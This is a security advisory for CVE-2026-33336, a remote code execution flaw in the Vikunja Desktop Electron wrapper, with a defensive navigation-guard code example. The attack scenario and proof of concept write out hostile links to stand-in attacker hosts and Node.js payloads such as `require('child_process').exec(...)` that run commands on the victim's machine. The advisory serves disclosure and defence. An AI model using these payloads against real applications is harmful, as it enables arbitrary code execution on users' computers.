CVE-2026-33336
Published: 24 March 2026
Description
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.

## Root cause

Two misconfigurations combine to create this vulnerability:

1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).
2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:
   - `<a href="https://...">` links (without `target="_blank"`)
   - `window.location` assignments
   - HTTP redirects
   - `<meta http-equiv="refresh">` tags

## Attack scenario

1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>`
3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.
4. The victim uses Vikunja Desktop and clicks the link.
5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.
6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');`
7. Arbitrary commands execute as the victim's OS user.
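The two guards the root cause section describes as missing, shown as an added example that is not Vikunja's code and not the v2.2.0 fix: a renderer configuration with `nodeIntegration` off, plus `will-navigate`, `will-redirect` and `setWindowOpenHandler` handlers that keep the window on the app's own origin and hand everything else to the system browser. It assumes the app UI is served from a single origin passed in as `appOrigin` (the placeholder `https://tasks.example.test`), that `openExternal` stands in for Electron's `shell.openExternal`, and that `simulateNavigation` with its fake window is a constructed harness so the policy can be run without Electron installed.

```javascript
// Added example, not Vikunja's code: navigation guards and renderer settings
// for an Electron main process. Assumes the app UI is served from one origin
// (`appOrigin`, e.g. the placeholder 'https://tasks.example.test') and that
// `openExternal` is Electron's shell.openExternal in production.

// webPreferences that deny the renderer any Node.js access; the advisory's
// vulnerable configuration sets nodeIntegration: true instead.
const SAFE_WEB_PREFERENCES = Object.freeze({
  nodeIntegration: false, // page JS cannot reach require('child_process') etc.
  contextIsolation: true, // preload-script globals are isolated from page JS
  sandbox: true,          // renderer runs inside the Chromium sandbox
  webSecurity: true,
});

// True only for http(s) URLs on the app's own origin. Unparsable URLs and
// other schemes (javascript:, file:, data:) are never treated as in-app.
function isAllowedNavigation(url, appOrigin) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return false;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return false;
  return parsed.origin === appOrigin;
}

// Install the guards the advisory lists as missing or incomplete.
// `win` is a BrowserWindow or anything exposing the same webContents methods;
// `openExternal(url)` hands off-origin links to the system browser.
function hardenWindow(win, appOrigin, openExternal) {
  const guard = (event, url) => {
    if (isAllowedNavigation(url, appOrigin)) return; // in-app: let it proceed
    event.preventDefault();                          // keep renderer on appOrigin
    if (/^https?:/i.test(url)) openExternal(url);    // never navigate there ourselves
  };
  // Same-window navigations: <a href>, window.location, <meta refresh>.
  win.webContents.on('will-navigate', guard);
  // Server-side redirects of the top-level document.
  win.webContents.on('will-redirect', guard);
  // window.open / target="_blank": never create a new BrowserWindow.
  win.webContents.setWindowOpenHandler(({ url }) => {
    if (/^https?:/i.test(url) && !isAllowedNavigation(url, appOrigin)) openExternal(url);
    return { action: 'deny' };
  });
  return win;
}

// Run the policy without Electron: a constructed stand-in for BrowserWindow
// records the handlers hardenWindow installs, then one navigation is fired.
// Returns whether it was blocked and which URLs went to the system browser.
function simulateNavigation(url, appOrigin, eventName = 'will-navigate') {
  const handlers = {};
  const opened = [];
  const fakeWin = {
    webContents: {
      on: (name, fn) => { handlers[name] = fn; },
      setWindowOpenHandler: (fn) => { handlers['window-open'] = fn; },
    },
  };
  hardenWindow(fakeWin, appOrigin, (u) => opened.push(u));
  let blocked = false;
  if (eventName === 'window-open') {
    blocked = handlers['window-open']({ url }).action === 'deny';
  } else {
    handlers[eventName]({ preventDefault: () => { blocked = true; } }, url);
  }
  return { blocked, opened };
}

// Constructed sample: the advisory's attacker link versus an in-app link.
const APP_ORIGIN = 'https://tasks.example.test';
console.log(simulateNavigation('https://evil.example/exploit', APP_ORIGIN));
// → { blocked: true, opened: [ 'https://evil.example/exploit' ] }
console.log(simulateNavigation(`${APP_ORIGIN}/projects/1`, APP_ORIGIN));
// → { blocked: false, opened: [] }
```

In a real main process this is wired as `hardenWindow(new BrowserWindow({ webPreferences: SAFE_WEB_PREFERENCES }), APP_ORIGIN, shell.openExternal)`. The event names and `setWindowOpenHandler` are Electron's; the origin, the `openExternal` parameter and the simulation harness are assumptions of this example. Disabling `nodeIntegration` is the control that removes the code-execution primitive; the navigation guards are defence in depth, and are what keep a sanitizer-approved hyperlink from turning the app window into a browser for an arbitrary origin.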
## Impact

Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.

## Proof of concept

1. Set up a Vikunja instance with two users sharing a project.
2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>`
3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>`
4. As the victim, open the project in Vikunja Desktop and click the link.
5. calc.exe (or any other command) executes on the victim's machine.

## Credits

This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
Mitigating Controls (NIST 800-53 r5) (AI-generated)
Flaw remediation directly mitigates the CVE by patching the Electron wrapper to version 2.2.0, which fixes nodeIntegration and adds navigation handlers.
Configuration settings enforce secure BrowserWindow webPreferences, disabling nodeIntegration and implementing will-navigate handlers to block unauthorized external navigations.
Separation of system and user functionality prevents renderer processes loading untrusted web content from accessing Node.js APIs, directly countering the RCE vector.
Security Summary (AI-generated)
CVE-2026-33336 affects the Vikunja Desktop Electron wrapper, an open-source self-hosted task management platform, in versions starting from 0.21.0 and prior to 2.2.0. The vulnerability stems from two misconfigurations in the Electron BrowserWindow: `nodeIntegration` enabled in web preferences, granting loaded pages full access to Node.js APIs such as `require`, `child_process`, and `fs`; and the absence of `will-navigate` or `will-redirect` handlers, allowing unrestricted same-window navigations triggered by HTML links, `window.location` assignments, HTTP redirects, or `<meta http-equiv="refresh">` tags.
An attacker who is a normal user on the same Vikunja instance, such as a member of a shared project, can exploit this by embedding a standard HTML link—e.g., `<a href="https://evil.example/exploit">Click here</a>`—in user-generated content like task descriptions, comments, or project descriptions. DOMPurify sanitization permits these legitimate anchor tags. When a victim using Vikunja Desktop clicks the link, the BrowserWindow navigates to the attacker's origin in the same renderer process. The attacker's JavaScript then executes with Node.js privileges, enabling arbitrary code execution on the victim's machine as their OS user, including file read/write, command execution, malware installation, and data exfiltration.
Version 2.2.0 patches the issue by addressing these Electron misconfigurations. The GitHub Security Advisory (GHSA-83w9-9jf6-88vf) and Vikunja changelog for v2.2.0 detail the fix, with the vulnerability carrying a CVSS v3.1 score of 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) and mapped to CWE-94. It was discovered via GitHub Security Lab Taskflows.
MITRE ATT&CK Enterprise Techniques (AI-generated)
Why these techniques?
Vulnerability in Electron app enables drive-by compromise (T1189) and exploitation for client execution (T1203) via malicious link (T1204.001) embedded in user content, allowing attacker-controlled JS to gain Node.js privileges for RCE upon navigation.